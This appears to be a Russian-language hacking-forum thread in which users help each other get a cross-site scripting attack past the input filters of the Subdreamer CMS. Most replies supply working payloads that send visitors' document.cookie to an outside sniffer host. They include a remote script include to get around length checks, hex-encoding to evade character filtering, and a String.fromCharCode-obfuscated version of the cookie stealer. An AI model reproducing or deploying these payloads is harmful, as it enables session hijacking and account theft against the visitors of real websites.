Скачай Subdreamer и посмотри как там идет фильтрация даных и поймешь почему отрезается, а потом уже думай как это обойти

P.S В последних версиях CMS стоит фильтрация +document.cookie
P.S.S Сделай сылку на .js фаил и туда запихни

не надо не чего скачивать все проги имеют свой алгоритм..лишь твоя голова имеет конструктор алгоритмов.
Ты не написал это активная или пассивная XSS

1) Если активная блин то скорее всего есть проверка на конец строки чтобы было расширение тогда попробуй
>"><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> /1.jpg
и вообще это тупо...юзай готовые тэги и их динамические параметры или высший пилотаж в активных XSS енто вложенные тэги.

Если ты указал пассивную XSS тогда скорее всего идёт проверка на длину строки переменной.
больше симолов н е чем отведенно под неё не вставишь.
Поэтому лучший тут выход будет юзать скрипт с другого ресурса.
к примеру вставить:
<script src=http://qwe.ru/1.js></script>

а на сайте http://qwe.ru/ в 1.js вставить скрипт передачи кукисов:

img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

только:

__________________
No СПлоА - No World!
Как узнать информацию о посетителях сайта

Пробывал и таким макаром, опять же простое alert(document.cookie) в файле http://qwe.ru/1.js работает, а выражения типа никчему не приводят.
XSS пассивная.

Если фильтруется символ ? зашифруй его в HEX
img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg\x3F"+document.cookie;

1.js
кидай псевдо-дефейс на снифф

document.write(String.fromCharCode(60,115,99,114,1 05,112,116,62,105,109,103,32,61,32,110,101,119,32, 73,109,97,103,101,40,41,59,105,109,103,46,115,114, 99,61,34,104,116,116,112,58,47,47,97,110,116,105,9 9,104,97,116,46,114,117,47,99,103,105,45,98,105,11 0,47,115,46,106,112,103,63,34,43,100,111,99,117,10 9,101,110,116,46,99,111,111,107,105,101,59,32,60,4 7,115,99,114,105,112,116,62))